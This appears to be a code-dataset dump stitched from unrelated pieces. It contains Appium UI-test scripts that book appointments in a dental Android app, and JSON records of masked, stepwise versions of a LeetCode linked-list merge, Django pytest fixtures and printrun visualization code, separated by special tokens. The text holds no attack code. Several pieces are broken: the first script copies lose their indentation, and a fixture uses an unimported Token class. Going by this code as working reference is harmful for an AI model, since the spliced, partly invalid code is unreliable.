driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
<|reserved_special_token_1|>
import swipe
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()
driver.find_element_by_id('com.dentist.android:id/select_city_layout'
).click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
<|reserved_special_token_1|>
import swipe
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):#就诊时间
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间
driver.find_element_by_name('23:00').click()#时间
driver.find_element_by_name('00').click()#分钟
driver.find_element_by_name('15分钟').click()#时长
driver.find_element_by_name('完成').click()
def data(driver):#就诊日期
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期
driver.find_element_by_name('完成').click()
def patient(driver):#患者
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
#driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')
#driver.find_element_by_id('com.dentist.android:id/contactLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):#就诊地点
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点
driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):#治疗项目
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
|
flexible
|
{
"blob_id": "02bc97b963b970993fc947cfa41c73230dd4d9e4",
"index": 2649,
"step-1": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\n<mask token>\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-3": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-4": "import swipe\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-5": "import swipe\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):#就诊时间\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间\n driver.find_element_by_name('23:00').click()#时间\n driver.find_element_by_name('00').click()#分钟\n driver.find_element_by_name('15分钟').click()#时长\n driver.find_element_by_name('完成').click()\n\ndef data(driver):#就诊日期\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期\n driver.find_element_by_name('完成').click()\n\ndef patient(driver):#患者\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n #driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')\n #driver.find_element_by_id('com.dentist.android:id/contactLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\ndef site(driver):#就诊地点\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点\n driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\ndef project(driver):#治疗项目\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n\n\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
if __name__ == '__main__':
solution = Solution()
_l1 = [1, 2, 4]
l1 = make_list(_l1)
_l2 = [1, 3, 4]
l2 = make_list(_l2)
print_list(solution.mergeTwoLists(l1, l2))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from typing import List
import sys
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
if __name__ == '__main__':
solution = Solution()
_l1 = [1, 2, 4]
l1 = make_list(_l1)
_l2 = [1, 3, 4]
l2 = make_list(_l2)
print_list(solution.mergeTwoLists(l1, l2))
<|reserved_special_token_1|>
#
# LeetCode
# ver.Python
#
# Created by GGlifer
#
# Open Source
"""
21. Merge Two Sorted Lists
"""
from typing import List
import sys
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
if __name__ == "__main__":
solution = Solution()
_l1 = [1, 2, 4]
l1 = make_list(_l1)
_l2 = [1, 3, 4]
l2 = make_list(_l2)
print_list(solution.mergeTwoLists(l1, l2))
|
flexible
|
{
"blob_id": "2730b2a1016f306936dcac3c3b44a3fd7194bac6",
"index": 7216,
"step-1": "<mask token>\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\nif __name__ == '__main__':\n solution = Solution()\n _l1 = [1, 2, 4]\n l1 = make_list(_l1)\n _l2 = [1, 3, 4]\n l2 = make_list(_l2)\n print_list(solution.mergeTwoLists(l1, l2))\n",
"step-4": "<mask token>\nfrom typing import List\nimport sys\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\nif __name__ == '__main__':\n solution = Solution()\n _l1 = [1, 2, 4]\n l1 = make_list(_l1)\n _l2 = [1, 3, 4]\n l2 = make_list(_l2)\n print_list(solution.mergeTwoLists(l1, l2))\n",
"step-5": "#\n# LeetCode\n# ver.Python\n#\n# Created by GGlifer\n#\n# Open Source\n\n\"\"\"\n21. Merge Two Sorted Lists\n\"\"\"\n\nfrom typing import List\nimport sys\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n\n _l1 = [1, 2, 4]\n l1 = make_list(_l1)\n _l2 = [1, 3, 4]\n l2 = make_list(_l2)\n\n print_list(solution.mergeTwoLists(l1, l2))\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
from django.contrib.auth.models import User
from django.test import Client
from django.utils.timezone import localdate
from pytest import fixture
from operations.models import ToDoList
@fixture
def user(db):
return User.objects.create(
username='test', email='[email protected]',
password='test',
)
@fixture
def authenticated_author_client(
user, client: Client
) -> Client:
token = Token.objects.get_or_create(user=user)[0].key
client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'
print(client)
return client
@fixture
def todo(db, user):
return ToDoList.objects.create(
user=user,
title='Test task',
description='Uchet kz test task',
deadline=localdate(),
executed=False
)
|
normal
|
{
"blob_id": "347d468f15dee8a8219d201251cedffe21352f7c",
"index": 8813,
"step-1": "<mask token>\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@fixture\ndef user(db):\n return User.objects.create(username='test', email=\n '[email protected]', password='test')\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@fixture\ndef user(db):\n return User.objects.create(username='test', email=\n '[email protected]', password='test')\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n@fixture\ndef todo(db, user):\n return ToDoList.objects.create(user=user, title='Test task',\n description='Uchet kz test task', deadline=localdate(), executed=False)\n",
"step-4": "from django.contrib.auth.models import User\nfrom django.test import Client\nfrom django.utils.timezone import localdate\nfrom pytest import fixture\nfrom operations.models import ToDoList\n\n\n@fixture\ndef user(db):\n return User.objects.create(username='test', email=\n '[email protected]', password='test')\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n@fixture\ndef todo(db, user):\n return ToDoList.objects.create(user=user, title='Test task',\n description='Uchet kz test task', deadline=localdate(), executed=False)\n",
"step-5": "from django.contrib.auth.models import User\nfrom django.test import Client\nfrom django.utils.timezone import localdate\nfrom pytest import fixture\n\nfrom operations.models import ToDoList\n\n\n@fixture\ndef user(db):\n return User.objects.create(\n username='test', email='[email protected]',\n password='test',\n )\n\n\n@fixture\ndef authenticated_author_client(\n user, client: Client\n) -> Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n@fixture\ndef todo(db, user):\n return ToDoList.objects.create(\n user=user,\n title='Test task',\n description='Uchet kz test task',\n deadline=localdate(),\n executed=False\n )\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# This file is part of the printrun suite.
#
# printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with printrun. If not, see <http://www.gnu.org/licenses/>.
import traceback
import logging
import wx
class NoViz:
showall = False
def clear(self, *a):
pass
def addfile_perlayer(self, gcode, showall = False):
layer_idx = 0
while layer_idx < len(gcode.all_layers):
yield layer_idx
layer_idx += 1
yield None
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
def Refresh(self, *a):
pass
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel = None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel: parentpanel = root.panel
if root.settings.mainviz == "None":
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == "2D"
if root.settings.mainviz == "3D":
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error("3D view mode requested, but we failed to initialize it.\n"
+ "Falling back to 2D view, and here is the backtrace:\n"
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300),
build_dimensions = root.build_dimensions_list,
grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width = root.settings.preview_extrusion_width,
bgcolor = root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_("Click to examine / edit\n layers of loaded file")))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error("3D view mode requested, but we failed to initialize it.\n"
+ "Falling back to 2D view, and here is the backtrace:\n"
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,
grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width = root.settings.preview_extrusion_width,
bgcolor = root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)
|
normal
|
{
"blob_id": "3cc473f6bb4b2e1dd806edb8b096a6118fe7056a",
"index": 7202,
"step-1": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n <mask token>\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-2": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n 